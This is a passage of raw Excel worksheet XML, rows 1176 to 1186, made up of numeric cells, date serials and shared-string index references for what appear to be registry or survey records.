        <v>8806</v>
      </c>
      <c r="C1176" t="s">
        <v>99</v>
      </c>
      <c r="D1176" t="s">
        <v>8807</v>
      </c>
      <c r="E1176" t="s">
        <v>142</v>
      </c>
      <c r="F1176" t="s">
        <v>8808</v>
      </c>
      <c r="G1176" s="1">
        <v>44301</v>
      </c>
      <c r="H1176">
        <v>9978</v>
      </c>
      <c r="I1176">
        <v>9978</v>
      </c>
      <c r="J1176">
        <v>1</v>
      </c>
      <c r="K1176">
        <v>0</v>
      </c>
      <c r="L1176">
        <v>0</v>
      </c>
      <c r="M1176">
        <v>2</v>
      </c>
      <c r="N1176">
        <v>0</v>
      </c>
      <c r="O1176">
        <v>0</v>
      </c>
      <c r="P1176">
        <v>0</v>
      </c>
      <c r="Q1176">
        <v>10</v>
      </c>
      <c r="R1176">
        <v>20</v>
      </c>
      <c r="S1176">
        <v>0</v>
      </c>
      <c r="T1176">
        <v>0</v>
      </c>
      <c r="U1176">
        <v>50000</v>
      </c>
      <c r="V1176">
        <v>0</v>
      </c>
      <c r="W1176">
        <v>0</v>
      </c>
      <c r="X1176">
        <v>300</v>
      </c>
      <c r="Y1176">
        <v>0</v>
      </c>
      <c r="Z1176">
        <v>0</v>
      </c>
      <c r="AA1176">
        <v>0</v>
      </c>
      <c r="AB1176">
        <v>1000</v>
      </c>
      <c r="AC1176">
        <v>2000</v>
      </c>
      <c r="AD1176">
        <v>0</v>
      </c>
      <c r="AE1176">
        <v>0</v>
      </c>
      <c r="AF1176" t="s">
        <v>8809</v>
      </c>
      <c r="AG1176">
        <v>11450</v>
      </c>
      <c r="AH1176">
        <v>12</v>
      </c>
      <c r="AJ1176">
        <v>159</v>
      </c>
      <c r="AK1176" t="s">
        <v>8810</v>
      </c>
      <c r="AL1176" t="s">
        <v>2640</v>
      </c>
      <c r="AM1176" t="s">
        <v>8811</v>
      </c>
      <c r="AN1176" t="s">
        <v>82</v>
      </c>
      <c r="AO1176">
        <v>2020</v>
      </c>
      <c r="AP1176" t="s">
        <v>623</v>
      </c>
      <c r="AQ1176" t="s">
        <v>8812</v>
      </c>
      <c r="AR1176" t="s">
        <v>8812</v>
      </c>
      <c r="AS1176" t="s">
        <v>71</v>
      </c>
      <c r="AT1176" t="s">
        <v>72</v>
      </c>
      <c r="AU1176">
        <v>26</v>
      </c>
      <c r="AV1176">
        <v>0</v>
      </c>
      <c r="AW1176">
        <v>0</v>
      </c>
      <c r="AX1176">
        <v>0</v>
      </c>
      <c r="AY1176">
        <v>10</v>
      </c>
      <c r="AZ1176">
        <v>10</v>
      </c>
      <c r="BA1176" t="s">
        <v>17581</v>
      </c>
      <c r="BB1176">
        <v>0</v>
      </c>
      <c r="BC1176" t="s">
        <v>13537</v>
      </c>
      <c r="BD1176" t="s">
        <v>13538</v>
      </c>
    </row>
    <row r="1177" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1177">
        <v>5505</v>
      </c>
      <c r="B1177" t="s">
        <v>2168</v>
      </c>
      <c r="C1177" t="s">
        <v>129</v>
      </c>
      <c r="D1177" t="s">
        <v>8813</v>
      </c>
      <c r="E1177" t="s">
        <v>300</v>
      </c>
      <c r="F1177" t="s">
        <v>8814</v>
      </c>
      <c r="G1177" s="1">
        <v>44312</v>
      </c>
      <c r="H1177">
        <v>9985</v>
      </c>
      <c r="I1177">
        <v>9985</v>
      </c>
      <c r="J1177">
        <v>1</v>
      </c>
      <c r="K1177">
        <v>1</v>
      </c>
      <c r="L1177">
        <v>0</v>
      </c>
      <c r="M1177">
        <v>0</v>
      </c>
      <c r="N1177">
        <v>0</v>
      </c>
      <c r="O1177">
        <v>0</v>
      </c>
      <c r="P1177">
        <v>0</v>
      </c>
      <c r="Q1177">
        <v>0</v>
      </c>
      <c r="R1177">
        <v>0</v>
      </c>
      <c r="S1177">
        <v>0</v>
      </c>
      <c r="T1177">
        <v>0</v>
      </c>
      <c r="U1177">
        <v>1035000</v>
      </c>
      <c r="V1177">
        <v>1035000</v>
      </c>
      <c r="W1177">
        <v>0</v>
      </c>
      <c r="X1177">
        <v>0</v>
      </c>
      <c r="Y1177">
        <v>0</v>
      </c>
      <c r="Z1177">
        <v>0</v>
      </c>
      <c r="AA1177">
        <v>0</v>
      </c>
      <c r="AB1177">
        <v>0</v>
      </c>
      <c r="AC1177">
        <v>0</v>
      </c>
      <c r="AD1177">
        <v>0</v>
      </c>
      <c r="AE1177">
        <v>0</v>
      </c>
      <c r="AF1177" t="s">
        <v>8815</v>
      </c>
      <c r="AG1177">
        <v>15720</v>
      </c>
      <c r="AH1177">
        <v>11</v>
      </c>
      <c r="AJ1177">
        <v>268</v>
      </c>
      <c r="AK1177" t="s">
        <v>4981</v>
      </c>
      <c r="AL1177" t="s">
        <v>6052</v>
      </c>
      <c r="AM1177" t="s">
        <v>8816</v>
      </c>
      <c r="AN1177" t="s">
        <v>55</v>
      </c>
      <c r="AO1177">
        <v>2007</v>
      </c>
      <c r="AP1177" t="s">
        <v>623</v>
      </c>
      <c r="AQ1177" t="s">
        <v>8817</v>
      </c>
      <c r="AR1177" t="s">
        <v>8818</v>
      </c>
      <c r="AS1177" t="s">
        <v>179</v>
      </c>
      <c r="AT1177" t="s">
        <v>58</v>
      </c>
      <c r="AU1177">
        <v>25</v>
      </c>
      <c r="AV1177">
        <v>1</v>
      </c>
      <c r="AW1177">
        <v>0</v>
      </c>
      <c r="AX1177">
        <v>0</v>
      </c>
      <c r="AY1177">
        <v>5</v>
      </c>
      <c r="AZ1177">
        <v>3</v>
      </c>
      <c r="BA1177" t="s">
        <v>16594</v>
      </c>
      <c r="BB1177" t="s">
        <v>16151</v>
      </c>
      <c r="BC1177" t="s">
        <v>12676</v>
      </c>
      <c r="BD1177">
        <v>0</v>
      </c>
    </row>
    <row r="1178" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1178">
        <v>5474</v>
      </c>
      <c r="B1178" t="s">
        <v>8819</v>
      </c>
      <c r="C1178" t="s">
        <v>129</v>
      </c>
      <c r="D1178" t="s">
        <v>8820</v>
      </c>
      <c r="E1178" t="s">
        <v>142</v>
      </c>
      <c r="F1178" t="s">
        <v>8821</v>
      </c>
      <c r="G1178" s="1">
        <v>44306</v>
      </c>
      <c r="H1178">
        <v>10045</v>
      </c>
      <c r="I1178">
        <v>10045</v>
      </c>
      <c r="J1178">
        <v>0</v>
      </c>
      <c r="K1178">
        <v>1</v>
      </c>
      <c r="L1178">
        <v>0</v>
      </c>
      <c r="M1178">
        <v>0</v>
      </c>
      <c r="N1178">
        <v>0</v>
      </c>
      <c r="O1178">
        <v>0</v>
      </c>
      <c r="P1178">
        <v>0</v>
      </c>
      <c r="Q1178">
        <v>0</v>
      </c>
      <c r="R1178">
        <v>0</v>
      </c>
      <c r="S1178">
        <v>0</v>
      </c>
      <c r="T1178">
        <v>0</v>
      </c>
      <c r="U1178">
        <v>0</v>
      </c>
      <c r="V1178">
        <v>500000</v>
      </c>
      <c r="W1178">
        <v>0</v>
      </c>
      <c r="X1178">
        <v>0</v>
      </c>
      <c r="Y1178">
        <v>0</v>
      </c>
      <c r="Z1178">
        <v>0</v>
      </c>
      <c r="AA1178">
        <v>0</v>
      </c>
      <c r="AB1178">
        <v>0</v>
      </c>
      <c r="AC1178">
        <v>0</v>
      </c>
      <c r="AD1178">
        <v>0</v>
      </c>
      <c r="AE1178">
        <v>0</v>
      </c>
      <c r="AF1178" t="s">
        <v>8822</v>
      </c>
      <c r="AG1178">
        <v>15211</v>
      </c>
      <c r="AH1178">
        <v>11</v>
      </c>
      <c r="AJ1178">
        <v>268</v>
      </c>
      <c r="AK1178" t="s">
        <v>252</v>
      </c>
      <c r="AL1178" t="s">
        <v>174</v>
      </c>
      <c r="AM1178" t="s">
        <v>8823</v>
      </c>
      <c r="AN1178" t="s">
        <v>55</v>
      </c>
      <c r="AO1178">
        <v>2011</v>
      </c>
      <c r="AP1178" t="s">
        <v>523</v>
      </c>
      <c r="AQ1178" t="s">
        <v>2378</v>
      </c>
      <c r="AR1178" t="s">
        <v>8822</v>
      </c>
      <c r="AS1178" t="s">
        <v>179</v>
      </c>
      <c r="AT1178" t="s">
        <v>58</v>
      </c>
      <c r="AU1178">
        <v>27</v>
      </c>
      <c r="AV1178">
        <v>0</v>
      </c>
      <c r="AW1178">
        <v>3</v>
      </c>
      <c r="AX1178">
        <v>0</v>
      </c>
      <c r="AY1178">
        <v>2</v>
      </c>
      <c r="AZ1178">
        <v>0</v>
      </c>
      <c r="BA1178" t="s">
        <v>16762</v>
      </c>
      <c r="BB1178" t="s">
        <v>17696</v>
      </c>
      <c r="BC1178" t="s">
        <v>9571</v>
      </c>
      <c r="BD1178" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="1179" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1179">
        <v>5465</v>
      </c>
      <c r="B1179" t="s">
        <v>4443</v>
      </c>
      <c r="C1179" t="s">
        <v>157</v>
      </c>
      <c r="D1179" t="s">
        <v>8824</v>
      </c>
      <c r="E1179" t="s">
        <v>363</v>
      </c>
      <c r="F1179" t="s">
        <v>364</v>
      </c>
      <c r="G1179" s="1">
        <v>44306</v>
      </c>
      <c r="H1179">
        <v>10061</v>
      </c>
      <c r="I1179">
        <v>10061</v>
      </c>
      <c r="J1179">
        <v>0</v>
      </c>
      <c r="K1179">
        <v>0</v>
      </c>
      <c r="L1179">
        <v>0</v>
      </c>
      <c r="M1179">
        <v>0</v>
      </c>
      <c r="N1179">
        <v>0</v>
      </c>
      <c r="O1179">
        <v>0</v>
      </c>
      <c r="P1179">
        <v>0</v>
      </c>
      <c r="Q1179">
        <v>0</v>
      </c>
      <c r="R1179">
        <v>0</v>
      </c>
      <c r="S1179">
        <v>0</v>
      </c>
      <c r="T1179">
        <v>1</v>
      </c>
      <c r="U1179">
        <v>0</v>
      </c>
      <c r="V1179">
        <v>0</v>
      </c>
      <c r="W1179">
        <v>0</v>
      </c>
      <c r="X1179">
        <v>0</v>
      </c>
      <c r="Y1179">
        <v>0</v>
      </c>
      <c r="Z1179">
        <v>0</v>
      </c>
      <c r="AA1179">
        <v>0</v>
      </c>
      <c r="AB1179">
        <v>0</v>
      </c>
      <c r="AC1179">
        <v>0</v>
      </c>
      <c r="AD1179">
        <v>0</v>
      </c>
      <c r="AE1179">
        <v>3225000</v>
      </c>
      <c r="AF1179" t="s">
        <v>4445</v>
      </c>
      <c r="AG1179">
        <v>61177</v>
      </c>
      <c r="AH1179">
        <v>16</v>
      </c>
      <c r="AJ1179">
        <v>252</v>
      </c>
      <c r="AK1179" t="s">
        <v>4856</v>
      </c>
      <c r="AL1179" t="s">
        <v>4855</v>
      </c>
      <c r="AM1179" t="s">
        <v>8825</v>
      </c>
      <c r="AN1179" t="s">
        <v>82</v>
      </c>
      <c r="AO1179">
        <v>2015</v>
      </c>
      <c r="AP1179" t="s">
        <v>8826</v>
      </c>
      <c r="AQ1179" t="s">
        <v>8827</v>
      </c>
      <c r="AR1179" t="s">
        <v>8828</v>
      </c>
      <c r="AS1179" t="s">
        <v>371</v>
      </c>
      <c r="AT1179" t="s">
        <v>86</v>
      </c>
      <c r="AU1179">
        <v>28</v>
      </c>
      <c r="AV1179">
        <v>1</v>
      </c>
      <c r="AW1179">
        <v>0</v>
      </c>
      <c r="AX1179">
        <v>0</v>
      </c>
      <c r="AY1179">
        <v>17</v>
      </c>
      <c r="AZ1179">
        <v>7</v>
      </c>
      <c r="BA1179" t="s">
        <v>16838</v>
      </c>
      <c r="BB1179" t="s">
        <v>17681</v>
      </c>
      <c r="BC1179" t="s">
        <v>10194</v>
      </c>
      <c r="BD1179" t="s">
        <v>13548</v>
      </c>
    </row>
    <row r="1180" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1180">
        <v>5479</v>
      </c>
      <c r="B1180" t="s">
        <v>8829</v>
      </c>
      <c r="C1180" t="s">
        <v>157</v>
      </c>
      <c r="D1180" t="s">
        <v>8830</v>
      </c>
      <c r="E1180" t="s">
        <v>1346</v>
      </c>
      <c r="F1180" t="s">
        <v>8831</v>
      </c>
      <c r="G1180" s="1">
        <v>44287</v>
      </c>
      <c r="H1180">
        <v>10109</v>
      </c>
      <c r="I1180">
        <v>10109</v>
      </c>
      <c r="J1180">
        <v>0</v>
      </c>
      <c r="K1180">
        <v>1</v>
      </c>
      <c r="L1180">
        <v>3</v>
      </c>
      <c r="M1180">
        <v>0</v>
      </c>
      <c r="N1180">
        <v>0</v>
      </c>
      <c r="O1180">
        <v>0</v>
      </c>
      <c r="P1180">
        <v>2</v>
      </c>
      <c r="Q1180">
        <v>2</v>
      </c>
      <c r="R1180">
        <v>4</v>
      </c>
      <c r="S1180">
        <v>3</v>
      </c>
      <c r="T1180">
        <v>1</v>
      </c>
      <c r="U1180">
        <v>0</v>
      </c>
      <c r="V1180">
        <v>15000</v>
      </c>
      <c r="W1180">
        <v>300</v>
      </c>
      <c r="X1180">
        <v>0</v>
      </c>
      <c r="Y1180">
        <v>0</v>
      </c>
      <c r="Z1180">
        <v>0</v>
      </c>
      <c r="AA1180">
        <v>35</v>
      </c>
      <c r="AB1180">
        <v>187</v>
      </c>
      <c r="AC1180">
        <v>273</v>
      </c>
      <c r="AD1180">
        <v>201</v>
      </c>
      <c r="AE1180">
        <v>7650</v>
      </c>
      <c r="AF1180" t="s">
        <v>8832</v>
      </c>
      <c r="AG1180">
        <v>64155</v>
      </c>
      <c r="AH1180">
        <v>16</v>
      </c>
      <c r="AJ1180">
        <v>233</v>
      </c>
      <c r="AK1180" t="s">
        <v>8833</v>
      </c>
      <c r="AL1180" t="s">
        <v>8834</v>
      </c>
      <c r="AM1180" t="s">
        <v>8835</v>
      </c>
      <c r="AN1180" t="s">
        <v>55</v>
      </c>
      <c r="AO1180">
        <v>2003</v>
      </c>
      <c r="AP1180" t="s">
        <v>8836</v>
      </c>
      <c r="AQ1180" t="s">
        <v>8837</v>
      </c>
      <c r="AR1180" t="s">
        <v>8838</v>
      </c>
      <c r="AS1180" t="s">
        <v>71</v>
      </c>
      <c r="AT1180" t="s">
        <v>58</v>
      </c>
      <c r="AU1180">
        <v>21</v>
      </c>
      <c r="AV1180">
        <v>1</v>
      </c>
      <c r="AW1180">
        <v>22</v>
      </c>
      <c r="AX1180">
        <v>60</v>
      </c>
      <c r="AY1180">
        <v>25</v>
      </c>
      <c r="AZ1180">
        <v>13</v>
      </c>
      <c r="BA1180" t="s">
        <v>16856</v>
      </c>
      <c r="BB1180">
        <v>0</v>
      </c>
      <c r="BC1180">
        <v>0</v>
      </c>
      <c r="BD1180" t="s">
        <v>10133</v>
      </c>
    </row>
    <row r="1181" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1181">
        <v>5492</v>
      </c>
      <c r="B1181" t="s">
        <v>8839</v>
      </c>
      <c r="C1181" t="s">
        <v>318</v>
      </c>
      <c r="D1181" t="s">
        <v>8840</v>
      </c>
      <c r="E1181" t="s">
        <v>300</v>
      </c>
      <c r="F1181" t="s">
        <v>8841</v>
      </c>
      <c r="G1181" s="1">
        <v>44299</v>
      </c>
      <c r="H1181">
        <v>10124</v>
      </c>
      <c r="I1181">
        <v>10124</v>
      </c>
      <c r="J1181">
        <v>1</v>
      </c>
      <c r="K1181">
        <v>1</v>
      </c>
      <c r="L1181">
        <v>2</v>
      </c>
      <c r="M1181">
        <v>0</v>
      </c>
      <c r="N1181">
        <v>0</v>
      </c>
      <c r="O1181">
        <v>0</v>
      </c>
      <c r="P1181">
        <v>0</v>
      </c>
      <c r="Q1181">
        <v>1</v>
      </c>
      <c r="R1181">
        <v>10</v>
      </c>
      <c r="S1181">
        <v>1</v>
      </c>
      <c r="T1181">
        <v>1</v>
      </c>
      <c r="U1181">
        <v>100000</v>
      </c>
      <c r="V1181">
        <v>1</v>
      </c>
      <c r="W1181">
        <v>3500</v>
      </c>
      <c r="X1181">
        <v>0</v>
      </c>
      <c r="Y1181">
        <v>0</v>
      </c>
      <c r="Z1181">
        <v>0</v>
      </c>
      <c r="AA1181">
        <v>0</v>
      </c>
      <c r="AB1181">
        <v>50</v>
      </c>
      <c r="AC1181">
        <v>300</v>
      </c>
      <c r="AD1181">
        <v>1</v>
      </c>
      <c r="AE1181">
        <v>1000</v>
      </c>
      <c r="AF1181" t="s">
        <v>8842</v>
      </c>
      <c r="AG1181">
        <v>90163</v>
      </c>
      <c r="AH1181">
        <v>26</v>
      </c>
      <c r="AJ1181">
        <v>420</v>
      </c>
      <c r="AK1181" t="s">
        <v>2663</v>
      </c>
      <c r="AL1181" t="s">
        <v>2664</v>
      </c>
      <c r="AM1181" t="s">
        <v>8843</v>
      </c>
      <c r="AN1181" t="s">
        <v>55</v>
      </c>
      <c r="AO1181">
        <v>2012</v>
      </c>
      <c r="AP1181">
        <v>81354844000</v>
      </c>
      <c r="AQ1181" t="s">
        <v>8844</v>
      </c>
      <c r="AR1181" t="s">
        <v>8842</v>
      </c>
      <c r="AS1181" t="s">
        <v>71</v>
      </c>
      <c r="AT1181" t="s">
        <v>58</v>
      </c>
      <c r="AU1181">
        <v>30</v>
      </c>
      <c r="AV1181">
        <v>1</v>
      </c>
      <c r="AW1181">
        <v>4</v>
      </c>
      <c r="AX1181">
        <v>30</v>
      </c>
      <c r="AY1181">
        <v>5</v>
      </c>
      <c r="AZ1181">
        <v>0</v>
      </c>
      <c r="BA1181" t="s">
        <v>16860</v>
      </c>
      <c r="BB1181" t="s">
        <v>16148</v>
      </c>
      <c r="BC1181" t="s">
        <v>9522</v>
      </c>
      <c r="BD1181">
        <v>0</v>
      </c>
    </row>
    <row r="1182" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1182">
        <v>5477</v>
      </c>
      <c r="B1182" t="s">
        <v>3535</v>
      </c>
      <c r="C1182" t="s">
        <v>790</v>
      </c>
      <c r="D1182" t="s">
        <v>8845</v>
      </c>
      <c r="E1182" t="s">
        <v>142</v>
      </c>
      <c r="F1182" t="s">
        <v>8846</v>
      </c>
      <c r="G1182" s="1">
        <v>44378</v>
      </c>
      <c r="H1182">
        <v>10245</v>
      </c>
      <c r="I1182">
        <v>10245</v>
      </c>
      <c r="J1182">
        <v>3</v>
      </c>
      <c r="K1182">
        <v>3</v>
      </c>
      <c r="L1182">
        <v>1</v>
      </c>
      <c r="M1182">
        <v>2</v>
      </c>
      <c r="N1182">
        <v>0</v>
      </c>
      <c r="O1182">
        <v>0</v>
      </c>
      <c r="P1182">
        <v>0</v>
      </c>
      <c r="Q1182">
        <v>1</v>
      </c>
      <c r="R1182">
        <v>4</v>
      </c>
      <c r="S1182">
        <v>0</v>
      </c>
      <c r="T1182">
        <v>1</v>
      </c>
      <c r="U1182">
        <v>70000</v>
      </c>
      <c r="V1182">
        <v>70000</v>
      </c>
      <c r="W1182">
        <v>20000</v>
      </c>
      <c r="X1182">
        <v>680</v>
      </c>
      <c r="Y1182">
        <v>0</v>
      </c>
      <c r="Z1182">
        <v>0</v>
      </c>
      <c r="AA1182">
        <v>0</v>
      </c>
      <c r="AB1182">
        <v>676</v>
      </c>
      <c r="AC1182">
        <v>40000</v>
      </c>
      <c r="AD1182">
        <v>0</v>
      </c>
      <c r="AE1182">
        <v>50000</v>
      </c>
      <c r="AF1182" t="s">
        <v>3537</v>
      </c>
      <c r="AG1182">
        <v>93461</v>
      </c>
      <c r="AH1182">
        <v>27</v>
      </c>
      <c r="AJ1182">
        <v>425</v>
      </c>
      <c r="AK1182" t="s">
        <v>8847</v>
      </c>
      <c r="AL1182" t="s">
        <v>8848</v>
      </c>
      <c r="AM1182" t="s">
        <v>8849</v>
      </c>
      <c r="AN1182" t="s">
        <v>55</v>
      </c>
      <c r="AO1182">
        <v>2013</v>
      </c>
      <c r="AP1182">
        <v>81245793637</v>
      </c>
      <c r="AQ1182" t="s">
        <v>8850</v>
      </c>
      <c r="AR1182" t="s">
        <v>8851</v>
      </c>
      <c r="AS1182" t="s">
        <v>71</v>
      </c>
      <c r="AT1182" t="s">
        <v>58</v>
      </c>
      <c r="AU1182">
        <v>50</v>
      </c>
      <c r="AV1182">
        <v>4</v>
      </c>
      <c r="AW1182">
        <v>68</v>
      </c>
      <c r="AX1182">
        <v>44</v>
      </c>
      <c r="AY1182">
        <v>64</v>
      </c>
      <c r="AZ1182">
        <v>18</v>
      </c>
      <c r="BA1182" t="s">
        <v>16608</v>
      </c>
      <c r="BB1182">
        <v>0</v>
      </c>
      <c r="BC1182">
        <v>0</v>
      </c>
      <c r="BD1182" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="1183" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1183">
        <v>5314</v>
      </c>
      <c r="B1183" t="s">
        <v>8852</v>
      </c>
      <c r="C1183" t="s">
        <v>47</v>
      </c>
      <c r="D1183" t="s">
        <v>8853</v>
      </c>
      <c r="E1183" t="s">
        <v>142</v>
      </c>
      <c r="F1183" t="s">
        <v>3660</v>
      </c>
      <c r="G1183" s="1">
        <v>44358</v>
      </c>
      <c r="H1183">
        <v>10286</v>
      </c>
      <c r="I1183">
        <v>10286</v>
      </c>
      <c r="J1183">
        <v>1</v>
      </c>
      <c r="K1183">
        <v>0</v>
      </c>
      <c r="L1183">
        <v>0</v>
      </c>
      <c r="M1183">
        <v>0</v>
      </c>
      <c r="N1183">
        <v>0</v>
      </c>
      <c r="O1183">
        <v>5</v>
      </c>
      <c r="P1183">
        <v>0</v>
      </c>
      <c r="Q1183">
        <v>0</v>
      </c>
      <c r="R1183">
        <v>0</v>
      </c>
      <c r="S1183">
        <v>1</v>
      </c>
      <c r="T1183">
        <v>1</v>
      </c>
      <c r="U1183">
        <v>200000</v>
      </c>
      <c r="V1183">
        <v>0</v>
      </c>
      <c r="W1183">
        <v>0</v>
      </c>
      <c r="X1183">
        <v>0</v>
      </c>
      <c r="Y1183">
        <v>0</v>
      </c>
      <c r="Z1183">
        <v>0</v>
      </c>
      <c r="AA1183">
        <v>0</v>
      </c>
      <c r="AB1183">
        <v>0</v>
      </c>
      <c r="AC1183">
        <v>0</v>
      </c>
      <c r="AD1183">
        <v>1</v>
      </c>
      <c r="AE1183">
        <v>0</v>
      </c>
      <c r="AF1183" t="s">
        <v>8854</v>
      </c>
      <c r="AG1183">
        <v>22616</v>
      </c>
      <c r="AH1183">
        <v>2</v>
      </c>
      <c r="AJ1183">
        <v>27</v>
      </c>
      <c r="AK1183" t="s">
        <v>2607</v>
      </c>
      <c r="AL1183" t="s">
        <v>2608</v>
      </c>
      <c r="AM1183" t="s">
        <v>8855</v>
      </c>
      <c r="AN1183" t="s">
        <v>55</v>
      </c>
      <c r="AO1183">
        <v>2020</v>
      </c>
      <c r="AP1183">
        <v>82277029714</v>
      </c>
      <c r="AQ1183" t="s">
        <v>8856</v>
      </c>
      <c r="AR1183" t="s">
        <v>8854</v>
      </c>
      <c r="AS1183" t="s">
        <v>71</v>
      </c>
      <c r="AT1183" t="s">
        <v>58</v>
      </c>
      <c r="AU1183">
        <v>26</v>
      </c>
      <c r="AV1183">
        <v>0</v>
      </c>
      <c r="AW1183">
        <v>30</v>
      </c>
      <c r="AX1183">
        <v>30</v>
      </c>
      <c r="AY1183">
        <v>16</v>
      </c>
      <c r="AZ1183">
        <v>16</v>
      </c>
      <c r="BA1183" t="s">
        <v>17668</v>
      </c>
      <c r="BB1183" t="s">
        <v>16161</v>
      </c>
      <c r="BC1183" t="s">
        <v>13626</v>
      </c>
      <c r="BD1183" t="s">
        <v>12117</v>
      </c>
    </row>
    <row r="1184" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1184">
        <v>5476</v>
      </c>
      <c r="B1184" t="s">
        <v>8857</v>
      </c>
      <c r="C1184" t="s">
        <v>129</v>
      </c>
      <c r="D1184" t="s">
        <v>8858</v>
      </c>
      <c r="E1184" t="s">
        <v>412</v>
      </c>
      <c r="F1184" t="s">
        <v>8859</v>
      </c>
      <c r="G1184" s="1">
        <v>44354</v>
      </c>
      <c r="H1184">
        <v>10358</v>
      </c>
      <c r="I1184">
        <v>10358</v>
      </c>
      <c r="J1184">
        <v>1</v>
      </c>
      <c r="K1184">
        <v>1</v>
      </c>
      <c r="L1184">
        <v>1</v>
      </c>
      <c r="M1184">
        <v>0</v>
      </c>
      <c r="N1184">
        <v>0</v>
      </c>
      <c r="O1184">
        <v>0</v>
      </c>
      <c r="P1184">
        <v>2</v>
      </c>
      <c r="Q1184">
        <v>2</v>
      </c>
      <c r="R1184">
        <v>0</v>
      </c>
      <c r="S1184">
        <v>0</v>
      </c>
      <c r="T1184">
        <v>0</v>
      </c>
      <c r="U1184">
        <v>15000</v>
      </c>
      <c r="V1184">
        <v>5000</v>
      </c>
      <c r="W1184">
        <v>5000</v>
      </c>
      <c r="X1184">
        <v>0</v>
      </c>
      <c r="Y1184">
        <v>0</v>
      </c>
      <c r="Z1184">
        <v>0</v>
      </c>
      <c r="AA1184">
        <v>50</v>
      </c>
      <c r="AB1184">
        <v>500</v>
      </c>
      <c r="AC1184">
        <v>0</v>
      </c>
      <c r="AD1184">
        <v>0</v>
      </c>
      <c r="AE1184">
        <v>0</v>
      </c>
      <c r="AF1184" t="s">
        <v>8860</v>
      </c>
      <c r="AG1184">
        <v>15211</v>
      </c>
      <c r="AH1184">
        <v>11</v>
      </c>
      <c r="AJ1184">
        <v>268</v>
      </c>
      <c r="AK1184" t="s">
        <v>252</v>
      </c>
      <c r="AL1184" t="s">
        <v>174</v>
      </c>
      <c r="AM1184" t="s">
        <v>8861</v>
      </c>
      <c r="AN1184" t="s">
        <v>55</v>
      </c>
      <c r="AO1184">
        <v>2018</v>
      </c>
      <c r="AP1184">
        <v>215592719</v>
      </c>
      <c r="AQ1184">
        <v>215592719</v>
      </c>
      <c r="AR1184" t="s">
        <v>8860</v>
      </c>
      <c r="AS1184" t="s">
        <v>71</v>
      </c>
      <c r="AT1184" t="s">
        <v>58</v>
      </c>
      <c r="AU1184">
        <v>26</v>
      </c>
      <c r="AV1184">
        <v>2</v>
      </c>
      <c r="AW1184">
        <v>0</v>
      </c>
      <c r="AX1184">
        <v>0</v>
      </c>
      <c r="AY1184">
        <v>21</v>
      </c>
      <c r="AZ1184">
        <v>8</v>
      </c>
      <c r="BA1184" t="s">
        <v>17687</v>
      </c>
      <c r="BB1184" t="e">
        <v>#N/A</v>
      </c>
      <c r="BC1184">
        <v>0</v>
      </c>
      <c r="BD1184" t="s">
        <v>11722</v>
      </c>
    </row>
    <row r="1185" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1185">
        <v>5290</v>
      </c>
      <c r="B1185" t="s">
        <v>8862</v>
      </c>
      <c r="C1185" t="s">
        <v>99</v>
      </c>
      <c r="D1185" t="s">
        <v>8863</v>
      </c>
      <c r="E1185" t="s">
        <v>142</v>
      </c>
      <c r="F1185" t="s">
        <v>2645</v>
      </c>
      <c r="G1185" s="1">
        <v>44299</v>
      </c>
      <c r="H1185">
        <v>10458</v>
      </c>
      <c r="I1185">
        <v>10458</v>
      </c>
      <c r="J1185">
        <v>1</v>
      </c>
      <c r="K1185">
        <v>0</v>
      </c>
      <c r="L1185">
        <v>1</v>
      </c>
      <c r="M1185">
        <v>0</v>
      </c>
      <c r="N1185">
        <v>0</v>
      </c>
      <c r="O1185">
        <v>0</v>
      </c>
      <c r="P1185">
        <v>0</v>
      </c>
      <c r="Q1185">
        <v>0</v>
      </c>
      <c r="R1185">
        <v>0</v>
      </c>
      <c r="S1185">
        <v>0</v>
      </c>
      <c r="T1185">
        <v>1</v>
      </c>
      <c r="U1185">
        <v>600000</v>
      </c>
      <c r="V1185">
        <v>0</v>
      </c>
      <c r="W1185">
        <v>5000</v>
      </c>
      <c r="X1185">
        <v>0</v>
      </c>
      <c r="Y1185">
        <v>0</v>
      </c>
      <c r="Z1185">
        <v>0</v>
      </c>
      <c r="AA1185">
        <v>0</v>
      </c>
      <c r="AB1185">
        <v>0</v>
      </c>
      <c r="AC1185">
        <v>0</v>
      </c>
      <c r="AD1185">
        <v>0</v>
      </c>
      <c r="AE1185">
        <v>50000</v>
      </c>
      <c r="AF1185" t="s">
        <v>8864</v>
      </c>
      <c r="AG1185">
        <v>14440</v>
      </c>
      <c r="AH1185">
        <v>12</v>
      </c>
      <c r="AJ1185">
        <v>160</v>
      </c>
      <c r="AK1185" t="s">
        <v>114</v>
      </c>
      <c r="AL1185" t="s">
        <v>115</v>
      </c>
      <c r="AM1185" t="s">
        <v>8865</v>
      </c>
      <c r="AN1185" t="s">
        <v>68</v>
      </c>
      <c r="AO1185">
        <v>2018</v>
      </c>
      <c r="AP1185">
        <v>2122664555</v>
      </c>
      <c r="AQ1185">
        <v>82111362827</v>
      </c>
      <c r="AR1185" t="s">
        <v>8864</v>
      </c>
      <c r="AS1185" t="s">
        <v>71</v>
      </c>
      <c r="AT1185" t="s">
        <v>72</v>
      </c>
      <c r="AU1185">
        <v>24</v>
      </c>
      <c r="AV1185">
        <v>0</v>
      </c>
      <c r="AW1185">
        <v>12</v>
      </c>
      <c r="AX1185">
        <v>3</v>
      </c>
      <c r="AY1185">
        <v>1</v>
      </c>
      <c r="AZ1185">
        <v>1</v>
      </c>
      <c r="BA1185" t="s">
        <v>16868</v>
      </c>
      <c r="BB1185">
        <v>0</v>
      </c>
      <c r="BC1185" t="s">
        <v>13725</v>
      </c>
      <c r="BD1185" t="s">
        <v>13726</v>
      </c>
    </row>
    <row r="1186" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A1186">
        <v>5473</v>
      </c>
      <c r="B1186" t="s">
        <v>8866</v>
      </c>
      <c r="C1186" t="s">
        <v>318</v>
      </c>
      <c r="D1186" t="s">
        <v>8867</v>
      </c>
      <c r="E1186" t="s">
        <v>363</v>
      </c>
      <c r="F1186" t="s">
        <v>547</v>
      </c>
